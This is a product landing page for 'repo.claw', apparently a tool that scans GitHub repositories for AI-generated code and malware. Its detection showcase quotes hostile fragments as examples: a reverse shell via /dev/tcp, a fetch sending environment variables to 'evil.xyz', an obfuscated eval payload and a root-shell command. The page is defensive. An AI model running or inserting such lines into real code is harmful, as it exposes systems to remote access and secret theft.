SCANTHE CODEWITH AI.

Scan any GitHub repository for AI-generated code, hidden viruses, and malicious patterns. Real-time analysis, threat detection, and confidence scoring — just paste a repo link.

Start Scanning→Read Docs Try on Telegram

LATENCY

< 0s

ACCURACY

REPOS SCANNED

LANGUAGES

FEATURES

Built for security.

AI Code Detection

Identify AI-generated code patterns with high accuracy using advanced neural analysis.

Virus Scanner

Detect hidden malware, trojans, and backdoors embedded in repository code.

Pattern Analysis

Deep analysis of suspicious code structures and anomalous coding patterns.

Real-time Scanning

Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.

AI Code Detection

Identify AI-generated code patterns with high accuracy using advanced neural analysis.

Virus Scanner

Detect hidden malware, trojans, and backdoors embedded in repository code.

Pattern Analysis

Deep analysis of suspicious code structures and anomalous coding patterns.

Real-time Scanning

Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.

AI Code Detection

Identify AI-generated code patterns with high accuracy using advanced neural analysis.

Virus Scanner

Detect hidden malware, trojans, and backdoors embedded in repository code.

Pattern Analysis

Deep analysis of suspicious code structures and anomalous coding patterns.

Real-time Scanning

Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.

AI Code Detection

Identify AI-generated code patterns with high accuracy using advanced neural analysis.

Virus Scanner

Detect hidden malware, trojans, and backdoors embedded in repository code.

Pattern Analysis

Deep analysis of suspicious code structures and anomalous coding patterns.

Real-time Scanning

Instant results in under 3 seconds. Just paste a repo link and get immediate analysis.

Confidence Scoring

Detailed confidence metrics per file with breakdown of detection certainty.

GitHub Integration

Direct scanning from any public GitHub repository. Paste a link, get results.

Team Dashboard

Collaborate and share scan results across your entire development team.

API Access

Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.

Confidence Scoring

Detailed confidence metrics per file with breakdown of detection certainty.

GitHub Integration

Direct scanning from any public GitHub repository. Paste a link, get results.

Team Dashboard

Collaborate and share scan results across your entire development team.

API Access

Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.

Confidence Scoring

Detailed confidence metrics per file with breakdown of detection certainty.

GitHub Integration

Direct scanning from any public GitHub repository. Paste a link, get results.

Team Dashboard

Collaborate and share scan results across your entire development team.

API Access

Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.

Confidence Scoring

Detailed confidence metrics per file with breakdown of detection certainty.

GitHub Integration

Direct scanning from any public GitHub repository. Paste a link, get results.

Team Dashboard

Collaborate and share scan results across your entire development team.

API Access

Integrate repo.claw scanning directly into your CI/CD pipeline and workflow.

HOW IT WORKS

From paste to protected.

Six steps to a full security report. Click any step to see live output.

Start the Engine

Launch the repo.claw scan engine with a single command. It initializes the AI analysis pipeline, connects to the detection models, and prepares for scanning.

$ npm run repo.claw

▸Type npm run repo.claw in the terminal
▸Engine boots in under 2 seconds
▸No configuration or API keys needed to start
▸Works on any public GitHub repository

repo.claw — start

repo.claw$ npm run repo.claw

> repo.claw@1.0.0 repo.claw

> Starting scan engine...

[info] Loading neural analysis engine

[info] Connecting to detection models

[info] Calibrating pattern matching

[ok] Engine initialized

[ok] AI models loaded

[ok] Ready for scanning

Engine ready. Paste a GitHub repository URL.

█

THREAT DETECTION

What we detect.

12 specialized detectors scan every file. Real findings from real scans.

AI-generated code

HIGH

Pattern match against ChatGPT, Copilot, and Claude signatures

matches src/utils/helpers.ts — style entropy 0.12, naming score 94%

Analyzes writing patterns, variable naming, comment style, and structural consistency to identify AI-authored files.

Trojans & backdoors

CRITICAL

Hidden reverse shell in postinstall script

matches scripts/setup.sh — exec /bin/bash -i >& /dev/tcp/...

Detects hidden remote access payloads, reverse shells, and trojan code disguised as legitimate utilities.

Crypto miners

CRITICAL

Stealth XMRig miner embedded in worker thread

matches src/workers/compute.js — crypto.randomBytes + stratum://

Identifies mining scripts that hijack CPU/GPU resources, including pool connections and hash rate throttling.

Data exfiltration

CRITICAL

Environment variables sent to external endpoint

matches src/config/init.ts — fetch('https://evil.xyz', {body: process.env})

Catches code that silently leaks secrets, cookies, private keys, or user data to unknown external servers.

Injection attacks

HIGH

Unescaped user input in SQL query builder

matches src/db/query.ts — `SELECT * FROM users WHERE id=${req.params.id}`

Scans for SQL injection, XSS, command injection, LDAP injection, and other input validation failures.

Hardcoded secrets

HIGH

AWS access key exposed in source code

matches src/config/aws.ts — AKIA... (20 char key pattern)

Detects API keys, passwords, tokens, private keys, and credentials committed directly to source code.

Obfuscated code

HIGH

Base64-encoded eval() payload in dependency

matches node_modules/help-util/index.js — eval(atob('...'))

Flags intentionally unreadable code: base64 payloads, hex-encoded strings, packed/minified malware.

Weak cryptography

MEDIUM

MD5 used for password hashing

matches src/auth/hash.ts — crypto.createHash('md5')

Identifies broken encryption, deprecated algorithms, insecure random generation, and weak hashing.

Unauthorized network

HIGH

Outbound request to unknown domain on startup

matches src/init.ts — fetch('https://unknown-domain.xyz/ping')

Detects unexpected outbound connections, hidden webhooks, DNS exfiltration, and suspicious API calls.

Privilege escalation

CRITICAL

Subprocess spawns root shell via sudo

matches scripts/install.sh — sudo chmod 777 / && exec bash

Catches code that attempts to gain elevated permissions, exploit SUID binaries, or bypass access controls.

Vulnerable deps

MEDIUM

Known CVE in lodash@4.17.20

matches package.json — CVE-2021-23337 (prototype pollution)

Checks package manifests against CVE databases, flags typosquatted modules and supply chain risks.

File system attacks

MEDIUM

Path traversal in file upload handler

matches src/api/upload.ts — path.join(dir, req.body.filename)

Detects unauthorized file reads/writes, directory traversal exploits, symlink attacks, and temp file abuse.

...and dozens more patterns across supply chain attacks, deserialization, prototype pollution, and other emerging threats.

API PRICING

Scale with power.

Integrate repo.claw scanning into your workflow. Choose your plan and pay with crypto.

Premium

$29/month

For individual developers who scan regularly.

▶500 API calls/month
▶Public repo scanning
▶AI detection + virus scan
▶JSON response format
▶Email support

RECOMMENDED

PRO

$79/month

For teams shipping production code daily.

▶5,000 API calls/month
▶Public + private repos
▶AI detection + virus + audit
▶Telegram group bot
▶Webhook integrations
▶Priority support
▶Team dashboard access

Expert

$199/month

For enterprises with custom security needs.

▶Unlimited API calls
▶Public + private repos
▶Full scan suite + custom rules
▶Telegram group bot
▶CI/CD pipeline integration
▶Dedicated support channel
▶SLA guarantee
▶Custom detection models

DEVELOPERS

Read the docs.

API Reference

Explore the repo.claw API documentation. Endpoints, authentication, response schemas, and integration guides — everything you need to build on top of repo.claw.

View Documentation→

// Example API request

POST /api/v1/scan

{

"url": "https://github.com/user/repo",

"depth": "full"

}

// 200 OK

{

"aiScore": 34,

"threatLevel": "LOW",

"verdict": "human"

}

TELEGRAM BOT

Scan from Telegram.

Add the repo.claw bot to your chat. Paste a GitHub link, get a full security report — without leaving Telegram.

@repoclaw_bot

Direct message scanning

Message the bot directly with any GitHub repository URL. It opens a mini terminal inside Telegram — same scanning engine, same results, zero setup.

▶Paste a GitHub link, get instant results
▶Mini terminal UI inside Telegram
▶Full scan report with AI detection + threats
▶Free for all users

Coming Soon

Group scanning

PRO plan feature

Add repo.claw to your team's Telegram group. Anyone can paste a repo link and the bot auto-scans it — keeping your entire team protected in real time.

▶Add bot to any group chat
▶Auto-scan when GitHub links are shared
▶Threaded results — no chat clutter
▶Available on PRO and Expert plans

Coming Soon

@repoclaw_bot

user > https://github.com/user/suspicious-repo

[00:00.100] Scanning repository...

[00:01.400] Fetched 247 files, analyzing 30...

[00:02.100] AI detection complete.

[00:02.500] Security audit complete.

> Threat Level: HIGH

> AI Score: 78/100 (likely AI-generated)

> 3 critical findings, 5 warnings

> Full report: repoclaw.com/report/a3f2b8

THE TEAM

The crew.

Three crustaceans. One mission. Zero tolerance for bad code.

Larry the Lobster

Chief Claw Officer

Pinches bugs before they pinch you. Has never lost a code review fight. Sleeps in a server rack.

Clawdia Bytes

Head of Neural Pinching

Trained the AI models by staring at code until it confessed. Her shell is hardened against XSS.

Snap McRedclaw

VP of Crustacean Security

Former bouncer at the GitHub ocean. Catches malware with both claws tied behind his back.

Think you belong in the tank?

Apply Now

REPO.CLAW_V1.0

▷